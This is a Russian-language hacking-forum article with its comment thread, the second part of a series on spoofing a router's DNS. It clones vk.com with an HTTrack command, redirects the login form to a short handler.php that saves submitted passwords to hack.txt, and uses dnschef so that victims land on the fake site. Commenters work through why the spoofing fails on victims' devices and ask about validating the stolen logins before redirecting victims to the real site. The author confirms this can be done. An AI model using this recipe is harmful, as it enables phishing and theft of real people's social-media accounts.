• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья [1] - Подмена DNS роутера, Граббинг сайта и получение доступов

Статья написана только для образовательных целей. Все делайте на свой страх и риск.

Всем Салам и Доброй ночи. Люблю сидеть ночью и писать статьи, вообще такое желание возникла в далеком 2012 году, когда еще учился в школе, создал компьютерный блог и писал много статей и в то время блог был достаточно популярным в этой тематике. И теперь вот ночью включаю какую-то комедию и начинаю писать. Итак, если помните в прошлой статье и написал о поднятии dns – прокси и подстановки нашего фейкового dns.

Сегодня продолжим и разберем, как мы будем граббить (делать копию) сайта и будем похищать пароли.

[0] – Немного теории. Что у нас есть?

Итак, давайте подробнее. Какими будут наши шаги:

1. Мы будем копировать сайт, который мы хотим подделать и использовать для фишинга. Делать я это буду с помощью программки HTTrack.
1.jpg


2. После чего переделам форму авторизации и с помощью мини php скрипта, будем сохранять полученные доступы в файл.

На этом все, это все на минимуме, без каких-либо наворотов, тут уже каждый может под себя дорабатывать. От теории перейдем к практике и разберем поподробнее.


[1] – Практика.

[1.1] – Граббинг сайта.

Итак, в первой части, для примера мы брали vk.com. Сейчас давайте, сделаем его копию, и зальем к нам на сервак, вместо того индексного файла. Сделаем это такой командой, с помощью HTTrack:
Код:
httrack https://vk.com --headers "Accept-Language: ru-RU,ru;q=0.5" -r2 -F "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" -O "/home/admin/web/vk.com/public_html"
Тут мы указываем url сайта, хедер для русской версии ВК, юзер-агент и куда будем копировать. После граббинга в итоге получаем такое содержимое:

upload_2018-1-6_0-8-8.png


upload_2018-1-6_0-51-55.png


Копию сайта сделали. Теперь перейдем к коду для изменении формы авторизации и написании нашего мини-скрипта.

[1.2] - Получаем доступы к аккаунту

Для того чтобы получать данные, которые пользователь вводит в форме, значение action, просто поменяем, а адрес нашего скрипта, где мы будем принимать данные.
В домашней директории создадим файл handler.php с содержимым:
Код:
$file = 'hack.txt';
file_put_contents($file, print_r($_POST, true), FILE_APPEND);
А на главной странице фейка, в параметр action подставим handler.php
upload_2018-1-6_1-4-23.png


Теперь при вводе данных и отправке их при нажатии кнопки, данные отправляются в файл handler.php и там обрабатываются и в виде массива сохраняется в файле.
upload_2018-1-6_1-7-40.png


Вуаля, таким образом мы можем вернуть наш взломанный аккаунт, соседом.

На этом закончим 2ою часть. Всем удачи и не нарушайте закон !

Часть 1
Часть 3
 
Последнее редактирование:

Rollly

Green Team
31.12.2017
109
133
BIT
0
HTTrack вообще установлен сам? Команда валидная, у вас значит какая-то другая ошибка
Установлен.
root@vm212708:~# httrack https://vk.com --headers "Accept-Language: ru-RU,ru;q=0.5" -r2 -F "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" -O "/home/admin/web/vk.com/public_html"
* Unknown option: headers

root@vm212708:~#
 

Rollly

Green Team
31.12.2017
109
133
BIT
0
Скрин киньте, и путь для сохранения верный?
Вообщем проблема такая, я все настроил днс прописал, решил сначала попробовать войти через телефон, при этом включив мобильную версию, тут мне пишет невозможно получить доступ к сайту, но если прописать m.vk.com, все идёт на оф сайт. Решил через ноутбук попробовать, и о чудо, все сработало, ввел данные, захожу на сервак так как был включен dnschef, я вышел из сервера, и снова вошёл, не обнаружив файла hack.txt, как я понял мне нужно было его создать, я его создал, и снова запустил dnschef, захожу на сайт через ноутбук, и сразу же появился официальный сайт vk, а не фейк, такое было не впервые, на прошлой неделе я пытался запустить подмену, и все сработало, только фейк заработал на телефоне, и чтобы получил логи, я снова вышел из сервера и зашёл, логи получил, решил снова запустить dnschef, и теперь снова фейк перестал работать, может быть ты поймёшь в чем проблема? Я старался все детально описать, как я понял, после получения логов, он перестает делать подмену, и редирект идёт уже на оф сайт.
 

r0hack

DAG
Gold Team
29.09.2017
522
1 087
BIT
0
Вообщем проблема такая, я все настроил днс прописал, решил сначала попробовать войти через телефон, при этом включив мобильную версию, тут мне пишет невозможно получить доступ к сайту, но если прописать m.vk.com, все идёт на оф сайт. Решил через ноутбук попробовать, и о чудо, все сработало, ввел данные, захожу на сервак так как был включен dnschef, я вышел из сервера, и снова вошёл, не обнаружив файла hack.txt, как я понял мне нужно было его создать, я его создал, и снова запустил dnschef, захожу на сайт через ноутбук, и сразу же появился официальный сайт vk, а не фейк, такое было не впервые, на прошлой неделе я пытался запустить подмену, и все сработало, только фейк заработал на телефоне, и чтобы получил логи, я снова вышел из сервера и зашёл, логи получил, решил снова запустить dnschef, и теперь снова фейк перестал работать, может быть ты поймёшь в чем проблема? Я старался все детально описать, как я понял, после получения логов, он перестает делать подмену, и редирект идёт уже на оф сайт.
Сложно сказать, почему у вас так. Пробуйте с другого браузера заходить например, может сохраняется кеш. Если есть наблюдения, что после записей логов потом не переходит на фейк, то просто не записывайте, сделайте, как написано в статье. В фейковых доменах укажите всевозможные алиасы домена --fakedomains=vk.com,

Точно не могу сказать, у меня если сервер запущен, стабильно переходит на фейк. Может от роутера тоже зависит, но это не точно. Я тестировал на D-link и Mikrotik, полет был нормальный.
 

Rollly

Green Team
31.12.2017
109
133
BIT
0
Заметил еще одно, если написать вконтакте через поиск, то при переходе будет написано, что страница недоступна, это происходит из за того, что в поиске указан https://vk.com. т.е при переходе будет оф.страница. И не факт, что подмена будет всегда работать, так как большинство добавляют сайты в закладки с https.
 
  • Нравится
Реакции: UsNm
S

shebang

Продолжайте публикации, очень увлекательно!!!!!
 

gushmazuko

Red Team
24.03.2017
173
451
BIT
0
Можно ли в handler.php замутить скрипт который сверет логин+пароль на валидность по адресу: " link removed", в случае успеха записывает их в файл и перенаправяет клиента на реальный сайт? Схожая схема с Fluxion.
 

r0hack

DAG
Gold Team
29.09.2017
522
1 087
BIT
0
Можно ли в handler.php замутить скрипт который сверет логин+пароль на валидность по адресу: " link removed", в случае успеха записывает их в файл и перенаправяет клиента на реальный сайт? Схожая схема с Fluxion.
Да, получится.
Если валидно, то перенаправляет на https.
 
  • Нравится
Реакции: gushmazuko
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!